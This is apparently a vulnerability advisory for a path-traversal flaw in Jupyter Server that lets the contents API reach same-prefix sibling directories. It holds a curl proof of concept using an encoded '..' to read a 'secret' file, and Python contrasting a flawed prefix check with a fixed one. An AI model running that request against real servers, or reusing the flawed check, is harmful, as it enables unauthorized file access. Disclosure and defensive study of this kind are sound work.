Summary: Jupyter Server <=2.17.0 can access directories that are siblings of the configured root directory when the sibling's name starts with the root directory's name (for example, root `test/` and sibling `testtest/`). A minimal PoC is given in the PoC section below.
| Field | Value |
|---|---|
| CVE ID | CVE-2026-35397 |
| Vendor | pip |
| Affected Product | jupyter-server |
| Vulnerability Type | Vulnerability |
| CVSS Score | 7.1 (HIGH) |
| Actively Exploited | ❌ No known exploitation |
| Patch Status | See Vendor Advisory |
| Reported By | CYBERDUDEBIVASH SENTINEL APEX Intelligence (via github_advisories) |
# PoC

Minimal layout:

```
.
├── test/            <- root directory
│   └── test.txt
└── testtest/
    └── secret.txt   <- file to exfiltrate that should not be reachable via the API
```

```bash
HOST="http://localhost:8888"
TOKEN=""
SIBLING="testtest"
TARGET="secret.txt"

curl -s -X POST \
  "$HOST/api/contents/%2e%2e/$SIBLING/$TARGET/checkpoints" \
  -H "Authorization: token $TOKEN"
```

Full PoC by @stef41: https://gist.github.com/Yann-P/66d4982a965dee8fcb8dd89db29e7006
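As an added illustration (not jupyter-server's own code), the following Python contrasts a string-prefix containment check, which accepts `testtest/` when the root is `test/`, with a boundary-aware check that rejects it. The directory layout, file contents and helper names (`naive_is_inside`, `is_inside`, `resolve_api_path`, `demo`) are constructed for this demo.

```python
# Added example: why a string-prefix root check admits a same-prefix sibling
# directory, and a path-component-aware check that does not.
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


def naive_is_inside(root: Path, candidate: Path) -> bool:
    """Flawed check: '/x/testtest/...' string-starts-with '/x/test', so it passes."""
    return str(candidate.resolve()).startswith(str(root.resolve()))


def is_inside(root: Path, candidate: Path) -> bool:
    """Boundary-aware check: root must be a whole path-component prefix of candidate."""
    root_r = root.resolve()
    cand_r = candidate.resolve()
    try:
        # commonpath works on components, so '/x/test' vs '/x/testtest' yields '/x'.
        return os.path.commonpath([root_r, cand_r]) == str(root_r)
    except ValueError:  # e.g. different drives on Windows: cannot be inside
        return False


def resolve_api_path(root: Path, api_path: str) -> Path:
    """Map a (possibly percent-encoded) contents-API path onto the filesystem.

    The advisory's PoC uses '%2e%2e'; decoding it once before joining is what
    turns it into a '..' segment at the filesystem layer.
    """
    return root / unquote(api_path)


def demo() -> dict:
    """Recreate the advisory's layout in a temp dir and evaluate both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        root = base / "test"                     # constructed root_dir
        root.mkdir()
        (root / "test.txt").write_text("ok")
        sibling = base / "testtest"              # constructed same-prefix sibling
        sibling.mkdir()
        (sibling / "secret.txt").write_text("constructed secret")
        inside = resolve_api_path(root, "test.txt")
        outside = resolve_api_path(root, "%2e%2e/testtest/secret.txt")
        return {
            "naive_inside": naive_is_inside(root, inside),
            "naive_outside": naive_is_inside(root, outside),   # True: the bug class
            "strict_inside": is_inside(root, inside),
            "strict_outside": is_inside(root, outside),        # False: rejected
        }
```

Appending `os.sep` to the prefix before `startswith` is the common quick fix; the `commonpath` form additionally copes with `..` segments and symlinks once both paths are resolved.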
in sibling directories sharing the same prefix as the `root_dir`. The attacker can escalate access, reading, writing,